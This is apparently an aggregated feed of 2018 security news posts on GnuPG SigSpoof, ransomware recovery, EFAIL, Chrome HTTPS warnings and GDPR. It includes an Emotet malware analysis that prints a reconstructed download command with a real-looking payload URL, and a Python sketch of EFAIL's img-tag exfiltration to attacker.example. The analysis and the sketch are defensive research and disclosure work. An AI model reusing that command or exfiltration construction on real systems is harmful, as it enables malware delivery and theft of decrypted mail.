Foldering is a way of communicating without sending a message.
A vulnerability affecting GnuPG has made some widely used email encryption software vulnerable to digital signature spoofing for many years. The list of affected programs includes Enigmail and GPGTools. The vulnerability (CVE-2018-12020), dubbed “SigSpoof” by Marcus Brinkmann, the researcher who found it, arises from “weak design choices.” “The signature verification routine in Enigmail 2.0.6.1, GPGTools 2018.2, and python-gnupg 0.4.2 parse the output of GnuPG 2.2.6 with a ‘--status-fd 2’ option, which …
The post Vulnerability in GnuPG allowed digital signature spoofing for decades appeared first on Help Net Security.
In this exclusive interview from April, the head of RSA Labs says that keeping up with bad guys is only half the job. Security firms also need to work hard to stay relevant as trends like cloud adoption, containerization, microservices and mobility shift the ground under information security providers. It is common knowledge in the security space...
Recently, Apricorn announced new research highlighting that 95 percent of surveyed organisations in the UK recognise problems with mobile and remote working, and nearly one in five (18%) suggest their mobile workers don’t care about security. In this podcast, Jon Fielding, Managing Director for Apricorn in EMEA, talks about the challenges related to securing mobile workers, and how they can be solved. Here’s a transcript of the podcast for your convenience. Hello, my name’s Jon …
The post The challenges of securing mobile workers and keeping data secure appeared first on Help Net Security.
Attackers demanded £120,000 from a Dorset business after infecting the company’s computer systems with crypto-ransomware. According to the Bournemouth Daily Echo, ransomware actors targeted an engineering firm located in Dorset, a county in the south-western part of England. A spokeswoman for the Dorset Police confirmed the attack and provided additional insight into the malefactors’ demands. […]
The post Ransomware Attackers Demand £120,000 from Dorset Business appeared first on The State of Security.
The Department of Justice and FBI have wanted tech companies to remove the encryption or weaken their algorithms for a long time.
Imagine the panic and concern that hits as you look at a screen that says: “All files on your computer have been locked. Please pay the ransom within 24 hours to get the key … or else.”
From the days of ransomware being distributed on floppy disks to modern-day attacks like WannaCry and Petya spreading around the world in minutes, this may be your image of ransomware recovery. Ransomware either locks your computer or your data before demanding a fee in exchange for the supposed safe return of your critical assets.
Unfortunately, the actual costs associated with ransomware go well beyond simply paying a ransom. The disruption this form of attack causes can bring operations to a halt — affecting the organization’s bottom line, reputation and brand.
Ransomware: To Err Is Human
Aside from blocking organizations from accessing their own data, cybercriminals also use ransomware to hide the delivery of other malware, steal data or simply cause business disruption. The growing sophistication and proliferation of ransomware over the past few years has led many companies to anticipate an eventual attack.
Recognizing the inevitability of a ransomware incident is a good first step toward mitigating this threat. But the reality is that organizations must immediately assess how their business has been disrupted — whether confidential or proprietary data is at risk and whether their recovery plan is sufficient — in the event of an attack.
Historically, ransomware payloads have been delivered via email attachments, malicious or hijacked websites and adware — just to name a few. But methods of ransomware deployment and execution usually have one thing in common: human intervention. Security training has helped educate users to be wary of suspicious emails from untrusted sources or unusual content, and this is a great start.
However, as more and more ransomware variants spread via broader means, it’s critical to augment ongoing user education with technical controls and processes for optimal protection. For example, it is crucial to apply security patches for all operating systems and software, and to keep antivirus and antimalware tools updated for the latest known attack vectors. It is also important to minimize and monitor system and data access permissions based on least privilege and job function.
Still, preventative measures can only do so much because, well, humans are human.
Known malware or vulnerabilities aren’t actually known until they are discovered, and protection is not provided until the antivirus and antimalware tools have been updated to detect these vulnerabilities. This recursive cycle of applying protection only after finding the problem requires us to think about additional methods that provide preventative protection and instant remediation in the event of an attack or infection.
As an example, let’s assume that someone (or something) has infiltrated your system or network. In an unprotected environment, data exfiltration is trivial once the system or network has been compromised. If the data is encrypted and cannot be decrypted without the proper authentication and authorization, however, data exfiltration is blocked even though the encrypted bits may be accessible to the attacker. This basic layer of protection gives you the peace of mind that even if malware or ransomware gets to your data, it is safe from unauthorized use or disclosure.
Make Backups, Encryption and Cloud Storage Your Priority
Even if your data is protected against theft or unauthorized disclosure, the files may still be locked by the ransomware. How can you regain access? According to an alert from the Department of Homeland Security (DHS) on ransomware and recent variants, it is critical to have a secure data backup and recovery process.
The DHS advised organizations to:
- Implement a backup and recovery plan for all critical data;
- Regularly test backups to limit the impact of a data breach and accelerate the recovery process; and
- Isolate critical backups from the network for maximum protection if network-connected backups are affected by ransomware.
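The DHS points above can be sketched concretely. Below is a minimal Python illustration of the first step: snapshotting critical data into a timestamped archive that can then be copied to isolated, off-network storage. The paths and file names are illustrative, not from any specific product.

```python
import os
import tarfile
import tempfile
from datetime import datetime, timezone

def snapshot(src_dir: str, dest_dir: str) -> str:
    """Bundle src_dir into a timestamped .tar.gz under dest_dir."""
    stamp = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%SZ")
    archive = os.path.join(dest_dir, f"backup-{stamp}.tar.gz")
    with tarfile.open(archive, "w:gz") as tar:
        tar.add(src_dir, arcname=os.path.basename(src_dir))
    return archive

# Example: back up a scratch directory containing one file.
src = tempfile.mkdtemp()
dest = tempfile.mkdtemp()
with open(os.path.join(src, "critical.txt"), "w") as f:
    f.write("important data")
path = snapshot(src, dest)
```

In a real deployment the resulting archive would be moved to storage the production network cannot reach, and restores would be tested on a schedule, per the second and third DHS points.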
While having a backup and recovery strategy is considered a best practice, the enormous amount of data organizations use every day can be challenging to back up, especially on a frequent basis. However, options for backing up large quantities of data exist today in the form of cloud storage.
The cloud has emerged as a low-cost alternative for backup and archiving, especially object storage where application programming interface (API) connectivity and geographic location choices make isolating backup data from the network relatively easy and inexpensive. But cloud storage comes with its own unique challenges, particularly privacy.
With the right approach, object store dependency and privacy concerns can be alleviated. Organizations must have technical and operational processes in place that allow data to be archived in object stores but stored in a way that explicitly blocks cloud service providers (CSPs) from accessing that data. In other words, the right approach is to copy, move, back up and archive data while encrypted and to make this practice a key part of the organization’s data protection strategy.
How to Simplify Ransomware Recovery
Ransomware is designed to enable cybercriminals to take command and control of your systems and business operations for quick financial gain or other malicious intent. Once a successful attack begins, you no longer have control or access to one of your organization’s most valuable assets: its data.
Conversely, the focus of ransomware recovery is all about maintaining control as efficiently and securely as possible. This necessitates making data protection with secure backup and recovery an essential part of your security processes. To align with new regulations, such as the General Data Protection Regulation (GDPR), security controls must be implemented by design and by default so that your data is protected from the time it is collected until the end of its life cycle.
Organizations need to control the who, what, when and how of systems and data that are accessed based on job function or role. This is good security hygiene at its most basic level. By using a strong, data-centric solution that combines encryption, access controls, key management and monitoring — and linking it to a secure backup strategy — organizations can narrow the attack surface for ransomware and better position organizational operations to continue in the face of an attack.
That sounds complex, but it’s not.
With emerging cloud data encryption tools that feature file and object store encryption capabilities, organizations can significantly reduce the risk and cost of ransomware with a single integrated solution that covers role-based access controls, advanced encryption, key management, access monitoring, object storage security with geographic dispersal and native backup and restore capabilities. In addition, these tools manage data protection consistently, whether you are protecting attached storage at the file or volume level or object storage via API — and regardless of whether it is on-premises, in the cloud or a hybrid environment.
Expanding on the concepts of regular backups with encryption and secure cloud storage takes the best practices of good security hygiene and adds layers of data protection, consistency, automation and control to help organizations become better prepared to weather the storm of evolving cyberthreats.
To learn how IBM Multi-Cloud Data Encryption supports ransomware recovery, join us for our upcoming webinar on June 28, 2018, “Guardium Tech Talk: Encrypting Your Object Store Data Without Giving Your Keys to the CSP.”
The post Ransomware Recovery: Maintain Control of Your Data in the Face of an Attack appeared first on Security Intelligence.
There is a simple reason for developers adopting the cloud and cloud-native application architectures. These “tools and methods” allow developers to accelerate innovation and feature delivery in the service of meeting business demands and keeping their enterprise competitive. While these tools and methods make noticeable improvements for DevOps teams, their new operational model creates security concerns and headaches for security practitioners. DevOps methods disaggregate the neatly packaged n-tier, VM-bound application into distributed architectures. The cloud …
The post Securing microservices and containers: A DevOps how-to guide appeared first on Help Net Security.
In part two of our series on decoding Emotet, (you can catch up on part 1 here), we’ll cover analysis of the PowerShell code. Before we do that, however, it is a good idea to list some of the functions and calls that are used in the code for the execution.
- System.Runtime.InteropServices.Marshal: used for memory management
- SecureStringToBSTR: used to convert the secure string to decrypted data
- ConvertTo-SecureString: used to convert the encrypted data into secure string
Encryption and PowerShell
There are a couple of ways to encrypt data using PowerShell. DPAPI (Data Protection Application Programming Interface) is one method of encrypting with PowerShell, but it’s not what our malware uses. Emotet downloader malware uses AES to encrypt data. So let’s take a look at how AES comes into play.
If the data is encrypted using ConvertTo-SecureString with NO key, PowerShell will by default use DPAPI, and the result will only work for the logged-in user on the machine it was encrypted on.
If the data is encrypted using ConvertTo-SecureString with a key, PowerShell will use AES to encrypt the data and it can be decrypted on any machine, by anyone who has the encryption key. Emotet downloader uses AES for encrypting the code, with the key hardcoded in the malware itself.
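The operational difference matters for analysts: a DPAPI-protected string is bound to one user on one machine, while an AES-with-key string travels with its key and decrypts anywhere. Here is a language-neutral toy sketch of that key-portability property (a SHA-256 counter-mode XOR keystream, which is explicitly NOT AES and NOT Emotet's actual code; the URL and key are made up):

```python
import hashlib
import itertools

def keystream(key: bytes, n: int) -> bytes:
    # SHA-256 in counter mode as a toy keystream -- illustration only.
    out = b""
    for i in itertools.count():
        out += hashlib.sha256(key + i.to_bytes(8, "big")).digest()
        if len(out) >= n:
            return out[:n]

def toy_crypt(data: bytes, key: bytes) -> bytes:
    # XOR is its own inverse, so the same call encrypts and decrypts.
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

secret = b"hxxp://payload.example/x.bin"  # defanged, hypothetical URL
key = b"hard-coded-key"                   # stands in for Emotet's embedded key

ct = toy_crypt(secret, key)
assert toy_crypt(ct, key) == secret   # any machine holding the key recovers it
```

A DPAPI-style secret, by contrast, could not be recovered this way off-box, which is exactly why the hard-coded key in the sample makes our decryption job possible.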
Code execution flow
In order to get to the encrypted code, we need to first understand the flow of execution. Let’s have a look at how the code is structured.
From the snippet above, we need to extract useful code and then re-construct the structure so that we can follow the execution-flow and decrypt the code.
Now that we have a usable code structure, we can move on to the next step.
The code above is looking for an encrypted data string that can then be run through ConvertTo-SecureString for decryption.
We now have access to the encrypted data from the VBA.
We will take that encrypted code and run it through ConvertTo-SecureString to start the decryption process.
Since the data string is so long, it is a good idea to first save it as a file and then pass it to a variable in PowerShell.
For the purpose of this analysis, we’ll save it as encrypted_code.txt.
Now, we’ll pass it to a variable $vEncrypted:
$vEncrypted = [IO.File]::ReadAllText("absolute_path\encrypted_code.txt")
There are different ways to achieve the same result. Get-Content can also be used.
Next, we run it through ConvertTo-SecureString to convert the encrypted string into a SecureString:
$vDecrypted = ConvertTo-SecureString -String $vEncrypted -Key (key goes here)
NOTE: The malware authors would have previously used “ConvertFrom-SecureString” with a key (now hard-coded into the malware code) to encrypt the data. We’re simply reversing the process to extract the encrypted code.
The last step is to now Marshal the SecureString through SecureStringToBSTR to get the decrypted code.
We’ll store the result in a variable to keep it clean and simple.
$vResult = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($vDecrypted))
Note that we have used SecureStringToBSTR instead of what the malware authors are using (SecureStringToGlobalAllocUnicode). SecureStringToBSTR converts the SecureString value to a binary string (BSTR) recognized by COM; SecureStringToGlobalAllocUnicode would work just as well.
That’s it. $vResult should now have the completely decrypted code with the payload URLs.
Now that we know the code flow, let’s run it in PowerShell and put all the knowledge we have gained by analyzing the code to work.
First of all, we’ll pass the encrypted code to the variable $vEncrypted:
As you can see below, the encrypted data has now been stored in our variable $vEncrypted:
The next step now is to convert the encrypted data into a SecureString by running it through the ConvertTo-SecureString function. We will use the key that we found hard-coded into the malware code. We will pass the output to the variable $vDecrypted:
In the next step, we will confirm if the conversion was successful or not. As we can see below, the conversion was successful:
Now, the final step to decrypt the data is to Marshal it through SecureStringToBSTR and pass the output to a variable, in this case $vResult:
It’s now time to print the output of the variable and look at the decrypted code!
We will further execute the code to extract the payload URLs and print them to the console in a clean, readable way. As we can see in the code, the variable $ADCX holds the URLs. We will use the split function as shown in the decrypted code and pass the output to $ADCX.
All we have to do now is print the value of $ADCX to console and we get all the URLs in a list.
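The splitting step itself is simple string handling. As a language-neutral sketch, assume a blob shaped like $ADCX, with several URLs joined by a delimiter (the '@' and the example.com-style hosts here are illustrative stand-ins, not the real IOCs):

```python
# Hypothetical blob in the same shape as $ADCX: URLs joined by a delimiter.
blob = "http://a.example/x1@http://b.example/x2@http://c.example/x3"

# Split on the delimiter and keep only well-formed URL fragments.
payload_urls = [u for u in blob.split("@") if u.startswith("http")]

for url in payload_urls:
    print(url)
```

Emotet typically tries each URL in turn until one download succeeds, which is why the blob carries several fallbacks.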
We already have the network IOC. At this point, we can go home! But do we ever?
Reconstructing the command-line arguments
Let’s reconstruct the full command-line arguments, mostly as a reward for completing the analysis!
Here’s our PowerShell code, structured and readable:
And here’s the same code, cleaned and beautified:
Now, we will look at all the variables and analyze them one-by-one to reconstruct the complete command-line arguments.
This variable is assigned the output of (new-object) random, which translates to System.Random.
Later in the code, this variable will be used to generate a random value (between 10,000 and 282,133) to be used as the file name for the downloaded payload. We’ll see that in action when we analyze $NSB.
This variable is assigned the value “(new-object) System.Net.WebClient,” which will be used later with DownloadFile to download content from the Internet with the specified URI and save it as a local file. We can have a look at the value assigned to the variable in the image below. These are the attributes that will be used to start the download of the payload.
As we saw earlier, this variable calls on the previously declared variable “nsadasd” in conjunction with “.next”, which turns the argument into the method “random.next.” This, in turn, would return a random number within the specified range (in this case, 10,000 – 282,133). As you can see below, it returns a different value each time it is executed.
$SDC = $env:public + '\' + $NSB + ('.exe');
This variable puts together the absolute path for the payload, complete with the file name that is generated by variable NSB.
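For readers following along without a Windows box, the $NSB / $SDC logic can be mirrored in a few lines of Python (a sketch of the same logic, not the malware's code; the fallback path is illustrative):

```python
import os
import random

# A random number in the observed range becomes the payload's file name...
nsb = random.randint(10000, 282133)

# ...under the Public folder (%PUBLIC% on Windows; hard-coded fallback here).
public = os.environ.get("PUBLIC", r"C:\Users\Public")
sdc = public + "\\" + str(nsb) + ".exe"
print(sdc)
```

The random name gives each infection a unique on-disk artifact, which defeats naive blocklists keyed on a fixed file name.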
We have already looked at the $ADCX variable and how to extract the URIs out of it. Now let’s reconstruct the entire command-line argument that is passed to the system for the malware to successfully download the payload, save it to local file, and execute it.
Here’s the way the code is executed by the malware using variables we analyzed above:
Let’s clean up the code to make it more readable:
Now that we know the value that these variables hold, let’s reconstruct the final command-line arguments that will be passed to the system for execution:
This is what it comes down to in the end:
(New-Object System.Net.WebClient)."DownloadFile"("http://lecap-services.fr/wiB9s"."ToString"(), "C:\Users\Public\264415.exe");
The command we have above will initiate the download of the data from the specified URI and save it to a local file as “C:\Users\Public\264415.exe”.
And this final command will start the execution of the payload.
Emotet: a complex malware
Emotet is one of the most active threats seen in the wild, with campaigns serving this malware daily to potential victims across the globe. The level of code obfuscation and encryption used to hide the code is quite complex and well-executed. In fact, it is one of the most complex downloaders in circulation.
That’s why we felt it was so important to help audiences understand Emotet in sufficient detail so that code variations or other changes in the future do not pose any major challenges to analysts trying to decode this malware. The more you know, the better and faster you are able to protect users from sophisticated malware attacks.
Last week, researchers disclosed vulnerabilities in a large number of encrypted e-mail clients: specifically, those that use OpenPGP and S/MIME, including Thunderbird and AppleMail. These are serious vulnerabilities: An attacker who can alter mail sent to a vulnerable client can trick that client into sending a copy of the plaintext to a web server controlled by that attacker. The story of these vulnerabilities and the tale of how they were disclosed illustrate some important lessons about security vulnerabilities in general and e-mail security in particular.
But first, if you use PGP or S/MIME to encrypt e-mail, you need to check the list on this page and see if you are vulnerable. If you are, check with the vendor to see if they've fixed the vulnerability. (Note that some early patches turned out not to fix the vulnerability.) If not, stop using the encrypted e-mail program entirely until it's fixed. Or, if you know how to do it, turn off your e-mail client's ability to process HTML e-mail or -- even better -- stop decrypting e-mails from within the client. There's even more complex advice for more sophisticated users, but if you're one of those, you don't need me to explain this to you.
Consider your encrypted e-mail insecure until this is fixed.
All software contains security vulnerabilities, and one of the primary ways we all improve our security is by researchers discovering those vulnerabilities and vendors patching them. It's a weird system: Corporate researchers are motivated by publicity, academic researchers by publication credentials, and just about everyone by individual fame and the small bug-bounties paid by some vendors.
Software vendors, on the other hand, are motivated to fix vulnerabilities by the threat of public disclosure. Without the threat of eventual publication, vendors are likely to ignore researchers and delay patching. This happened a lot in the 1990s, and even today, vendors often use legal tactics to try to block publication. It makes sense; they look bad when their products are pronounced insecure.
Over the past few years, researchers have started to choreograph vulnerability announcements to make a big press splash. Clever names -- the e-mail vulnerability is called "Efail" -- websites, and cute logos are now common. Key reporters are given advance information about the vulnerabilities. Sometimes advance teasers are released. Vendors are now part of this process, trying to announce their patches at the same time the vulnerabilities are announced.
This simultaneous announcement is best for security. While it's always possible that some organization -- either government or criminal -- has independently discovered and is using the vulnerability before the researchers go public, use of the vulnerability is essentially guaranteed after the announcement. The time period between announcement and patching is the most dangerous, and everyone except would-be attackers wants to minimize it.
Things get much more complicated when multiple vendors are involved. In this case, Efail isn't a vulnerability in a particular product; it's a vulnerability in a standard that is used in dozens of different products. As such, the researchers had to ensure both that everyone knew about the vulnerability in time to fix it and that no one leaked the vulnerability to the public during that time. As you can imagine, that's close to impossible.
Efail was discovered sometime last year, and the researchers alerted dozens of different companies between last October and March. Some companies took the news more seriously than others. Most patched. Amazingly, news about the vulnerability didn't leak until the day before the scheduled announcement date. Two days before the scheduled release, the researchers unveiled a teaser -- honestly, a really bad idea -- which resulted in details leaking.
After the leak, the Electronic Frontier Foundation posted a notice about the vulnerability without details. The organization has been criticized for its announcement, but I am hard-pressed to find fault with its advice. (Note: I am a board member at EFF.) Then, the researchers published -- and lots of press followed.
All of this speaks to the difficulty of coordinating vulnerability disclosure when it involves a large number of companies or -- even more problematic -- communities without clear ownership. And that's what we have with OpenPGP. It's even worse when the bug involves the interaction between different parts of a system. In this case, there's nothing wrong with PGP or S/MIME in and of themselves. Rather, the vulnerability occurs because of the way many e-mail programs handle encrypted e-mail. GnuPG, an implementation of OpenPGP, decided that the bug wasn't its fault and did nothing about it. This is arguably true, but irrelevant. They should fix it.
Expect more of these kinds of problems in the future. The Internet is shifting from a set of systems we deliberately use -- our phones and computers -- to a fully immersive Internet-of-things world that we live in 24/7. And like this e-mail vulnerability, vulnerabilities will emerge through the interactions of different systems. Sometimes it will be obvious who should fix the problem. Sometimes it won't be. Sometimes it'll be two secure systems that, when they interact in a particular way, cause an insecurity. In April, I wrote about a vulnerability that arose because Google and Netflix make different assumptions about e-mail addresses. I don't even know who to blame for that one.
It gets even worse. Our system of disclosure and patching assumes that vendors have the expertise and ability to patch their systems, but that simply isn't true for many of the embedded and low-cost Internet of things software packages. They're designed at a much lower cost, often by offshore teams that come together, create the software, and then disband; as a result, there simply isn't anyone left around to receive vulnerability alerts from researchers and write patches. Even worse, many of these devices aren't patchable at all. Right now, if you own a digital video recorder that's vulnerable to being recruited for a botnet -- remember Mirai from 2016? -- the only way to patch it is to throw it away and buy a new one.
Patching is starting to fail, which means that we're losing the best mechanism we have for improving software security at exactly the same time that software is gaining autonomy and physical agency. Many researchers and organizations, including myself, have proposed government regulations enforcing minimal security standards for Internet-of-things devices, including standards around vulnerability disclosure and patching. This would be expensive, but it's hard to see any other viable alternative.
Getting back to e-mail, the truth is that it's incredibly difficult to secure well. Not because the cryptography is hard, but because we expect e-mail to do so many things. We use it for correspondence, for conversations, for scheduling, and for record-keeping. I regularly search my 20-year e-mail archive. The PGP and S/MIME security protocols are outdated, needlessly complicated and have been difficult to properly use the whole time. If we could start again, we would design something better and more user-friendly, but the huge number of legacy applications that use the existing standards means that we can't. I tell people that if they want to communicate securely with someone, to use one of the secure messaging systems: Signal, Off-the-Record, or -- if having one of those two on your system is itself suspicious -- WhatsApp. Of course they're not perfect, as last week's announcement of a vulnerability (patched within hours) in Signal illustrates. And they're not as flexible as e-mail, but that makes them easier to secure.
This essay previously appeared on Lawfare.com.
Developing GDPR Compliant Applications Guidance
- Part 1: A Developer's Guide to the GDPR
- Part 2: Application Privacy by Design
- Part 3: Minimizing Application Privacy Risk
The General Data Protection Regulation (GDPR) was created by the European Commission and Council to strengthen and unify Europe's data protection law, replacing the 1995 European Data Protection Directive. Although the GDPR is a European Union (EU) regulation, it applies to any organizations outside of Europe that handle the personal data of EU citizens. This includes the development of applications that are intended to process the personal information of EU citizens. Therefore, organizations that provide web applications, mobile apps, or traditional desktop applications that can indirectly process EU citizens' personal data or allow EU citizens to sign in are subject to the GDPR's privacy obligations. Organizations face the prospect of powerful sanctions should applications fail to comply with the GDPR.
Part 1: A Developer's Guide to the GDPR
Part 1 summarizes the GDPR and explains how the privacy regulation impacts and applies to developing and supporting applications that are intended to be used by European Union citizens.
Part 2: Application Privacy by Design
Part 3: Minimizing Application Privacy Risk
Part 3 provides practical application development techniques that can alleviate an application's privacy risk.
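One concrete minimization technique in the spirit of Part 3 is to pseudonymize identifiers before storage, so analytics and logs never hold the raw value. The sketch below uses a keyed HMAC; the secret, field, and sample address are illustrative, and a real deployment would also need key management and retention rules:

```python
import hashlib
import hmac

def pseudonymize(email: str, secret: bytes) -> str:
    # Keyed hash (HMAC-SHA256) of a normalized identifier: stable for joins,
    # but not reversible without the secret.
    normalized = email.strip().lower().encode()
    return hmac.new(secret, normalized, hashlib.sha256).hexdigest()

token = pseudonymize("Alice@Example.com", b"app-secret")
```

Because the mapping depends on the secret, rotating or destroying the key effectively severs the link back to the data subject, which is useful when honoring erasure requests.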
In this podcast recorded at RSA Conference 2018, Asif Karel, Director of Product Management at Qualys, illustrates why certificate visibility and security should not just be bolted on but part of the solution, and he showcases how Qualys CertView can help with that. Here’s a transcript of the podcast for your convenience. Hello. My name is Asif Karel. I am the Director of Product Management at Qualys for certificate management. In this Help Net Security …
The post Make certificate visibility and security a part of your overall security program appeared first on Help Net Security.
On numbers stations.
Read more of this story at Slashdot.
By Linus Chang, CEO and Founder at Scram Software, Cloud-based services are so commonplace today that it’s tempting to simply trust them with your data. After all, everyone else is
The post Why Encryption Is Now a ‘Need to Have,’ Not Just a ‘Nice to Have’ appeared first on The Cyber Security Place.
The FBI has misled Congress and the public about the extent to which encrypted cellphones are hampering federal investigations by preventing authorities from accessing the devices, presumably to support the agency's own agenda to gain backdoor access to them. The FBI claimed that its investigators were locked out of nearly 7,800...
Google expects HTTPS to become the default, and is preparing users for it by slowly moving Chrome towards showing only negative security indicators. Google’s own numbers showed back in February that 68% of Chrome traffic on both Android and Windows was encrypted, as was 78% of Chrome traffic on both Chrome OS and Mac. By now, these numbers are surely even higher. “Users should expect that the web is safe by default, and they’ll be … More
The post Chrome to dynamically point out “Not secure” HTTP sites appeared first on Help Net Security.
In episode #97, we talk with Robert Xiao, the Carnegie Mellon researcher who investigated LocationSmart, a free web application that allowed anyone to track the location of a mobile phone using just the phone’s number. Also: we welcome University of Washington researcher Kate Starbird back into the SL studio to talk about her latest...
Starting with Chrome 70, Google will mark HTTP content with a red warning, as Big G continues its effort to make the web more secure.
Since January 2017, Chrome indicates connection security with an icon in the address bar labeling HTTP connections to sites as non-secure, while since May 2017 Google is marking newly registered sites that serve login pages or password input fields over HTTP as not secure.
Back to the present: in May 2018, the overall encrypted traffic for several Google products is more than 93%.
“Security is a top priority at Google. We are investing and working to make sure that our sites and services provide modern HTTPS by default. Our goal is to achieve 100% encryption across our products and services. The chart below shows how we’re doing across Google.” reads the Google Transparency report.
This is an important success for Google, considering that in early 2014 only 50% of its traffic was encrypted.
According to the Google Transparency Report, around 75% of the pages loaded via Chrome in early May 2018 were served over secure HTTPS connections, up from only around 40% in 2014.
Google now plans to mark unencrypted connections with a red “Not Secure” warning.
“Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” reads a blog post published by Google.
“We hope these changes continue to pave the way for a web that’s easy to use safely, by default. HTTPS is cheaper and easier than ever before, and unlocks powerful capabilities — so don’t wait to migrate to HTTPS! Check out our set-up guides to get started,” explained Emily Schechter, Product Manager, Chrome Security.
(Security Affairs – Chrome 70, HTTPS)
The post Chrome evolves security indicators by marking with a red warning for HTTP content appeared first on Security Affairs.
A lot changed in the 4 years between the last two OWASP Top 10 lists. In this end user perspective, security pro Dino Londis talks about those changes and argues that organizations need to address the most common web application attacks, even as they work to engineer a new generation of secure applications. According to OWASP, “Insecure...
A new PGP vulnerability was announced today. Basically, the vulnerability makes use of the fact that modern e-mail programs allow for embedded HTML objects. Essentially, if an attacker can intercept and modify a message in transit, he can insert code that sends the plaintext in a URL to a remote website. Very clever.
The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.
The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim's email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.
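The mechanics can be sketched in a few lines of Python. This is a toy model under stated assumptions: `attacker.example` is a hypothetical domain, and `fake_decrypt` stands in for the victim client's real OpenPGP/S-MIME decryption.

```python
# Toy model of the EFAIL "direct exfiltration" channel described above.
# The attacker sandwiches the captured ciphertext between two HTML body
# parts so that, after the client decrypts it, the plaintext sits inside
# an <img> URL that the mail client fetches automatically.

def build_efail_parts(ciphertext: str) -> list:
    """The three MIME body parts an attacker stitches into one message."""
    return [
        '<img src="http://attacker.example/',  # opens an unclosed img tag
        ciphertext,                            # client decrypts this in place
        '">',                                  # closes the attribute and tag
    ]

def simulate_vulnerable_client(parts: list, decrypt) -> str:
    """Decrypt the middle part, render the HTML, and return the URL the
    image loader would request -- leaking the plaintext to the attacker."""
    html = parts[0] + decrypt(parts[1]) + parts[2]
    start = html.index('src="') + len('src="')
    return html[start:html.index('"', start)]

# Stand-in for real OpenPGP/S-MIME decryption of an old intercepted email.
fake_decrypt = lambda _ciphertext: "meet me at noon"

leaked_url = simulate_vulnerable_client(build_efail_parts("<blob>"), fake_decrypt)
assert leaked_url == "http://attacker.example/meet me at noon"
```

The mitigation of disabling HTML rendering works precisely because, without the image loader, the final URL request never happens.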
A few initial comments:
1. Being able to intercept and modify e-mails in transit is the sort of thing the NSA can do, but is hard for the average hacker. That being said, there are circumstances where someone can modify e-mails. I don't mean to minimize the seriousness of this attack, but that is a consideration.
2. The vulnerability isn't with PGP or S/MIME itself, but in the way they interact with modern e-mail programs. You can see this in the two suggested short-term mitigations: "No decryption in the e-mail client," and "disable HTML rendering."
3. I've been getting some weird press calls from reporters wanting to know if this demonstrates that e-mail encryption is impossible. No, this just demonstrates that programmers are human and vulnerabilities are inevitable. PGP almost certainly has fewer bugs than your average piece of software, but it's not bug free.
4. Why is anyone using encrypted e-mail anymore, anyway? Reliably and easily encrypting e-mail is an insurmountably hard problem for reasons having nothing to do with today's announcement. If you need to communicate securely, use Signal. If having Signal on your phone will arouse suspicion, use WhatsApp.
I'll post other commentaries and analyses as I find them.
We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now.
This sounds like a protocol vulnerability, but we'll learn more tomorrow.
A survey of over 500 security professionals has revealed, rather disconcertingly, that most believe governments should regulate the way social networks handle our data, and even install encryption backdoors to that end. At the same time, most experts also berate governments for their lax understanding of social media and digital privacy.
Deeply contrasting results were revealed by the survey conducted by Venafi at RSA Conference 2018, with the help of 512 industry professionals willing to answer questions about the current state of affairs in cyber security.
Surveyors wanted to learn how industry experts view the increasingly blurry lines between cyber security, privacy threats and government regulation. So they asked participants: should governments regulate the collection of personal data by social media companies?
Some 70% of respondents said governments should indeed regulate social media companies’ collection of personal data to protect user privacy. Meanwhile, 72% said bureaucrats don’t understand current digital privacy threats. Worse yet, participants couldn’t articulate exactly what governments should do to protect our privacy online.
Kevin Bocek, VP of security strategy and threat intelligence at Venafi, believes the results are “disturbing.”
“While security professionals agree that government officials do not understand the nuances of social media and digital privacy,” he said, “they’re still looking to them to regulate the technology that permeates our daily lives.”
45% of the respondents went as far as to say that governments should be able to impose encryption backdoors on private companies – in other words, to allow the government to obtain anyone’s personal data whenever it wants.
Bocek believes this would motivate bad actors to pour all their resources into stealing such backdoors and then sell them to the highest bidders on the underground web.
The survey did reveal some positive numbers as well: 64% of respondents say their personal encryption usage has increased due to recent geopolitical changes, up from 45% in a similar survey conducted last year.
In this podcast recorded at RSA Conference 2018, Francis Knott, VP of Business Development at Silent Circle, talks about the modern privacy landscape, and introduces Silent Circle’s Silent Phone and GoSilent products. Here’s a transcript of the podcast for your convenience. We are here at the RSA Conference with Francis Knott, the VP of Business Development at Silent Circle, to discuss the recent claims by Homeland Security that the organization has observed anomalous activity in … More
The post Protecting your business behind a shield of privacy appeared first on Help Net Security.
Researchers have found critical vulnerabilities in PGP and S/MIME tools; users should immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.
If you are one of the users of the email encryption tools Pretty Good Privacy and S/MIME there is an important warning for you.
A group of European security experts has discovered a set of critical vulnerabilities in PGP and S/MIME encryption tools that could reveal your encrypted emails in plain text, including ones you sent in the past.
Pretty Good Privacy is the open source end-to-end encryption standard used to encrypt emails, while S/MIME, Secure/Multipurpose Internet Mail Extensions, is an asymmetric cryptography-based technology that allows users to send digitally signed and encrypted emails.
Sebastian Schinzel, a professor of computer security at the Münster University of Applied Sciences, warned that Pretty Good Privacy (PGP) might actually allow Pretty Grievous P0wnage due to the vulnerabilities, and the worst news is that there are currently no reliable fixes.
There are currently no reliable fixes for the vulnerability. If you use PGP/GPG or S/MIME for very sensitive communication, you should disable it in your email client for now. Also read @EFF’s blog post on this issue: https://t.co/zJh2YHhE5q #efail 2/4
— Sebastian Schinzel (@seecurity) May 14, 2018
The existence of the vulnerabilities was also confirmed by researchers at the Electronic Frontier Foundation (EFF); the organization also recommended that users uninstall Pretty Good Privacy and S/MIME applications until the issues are fixed.
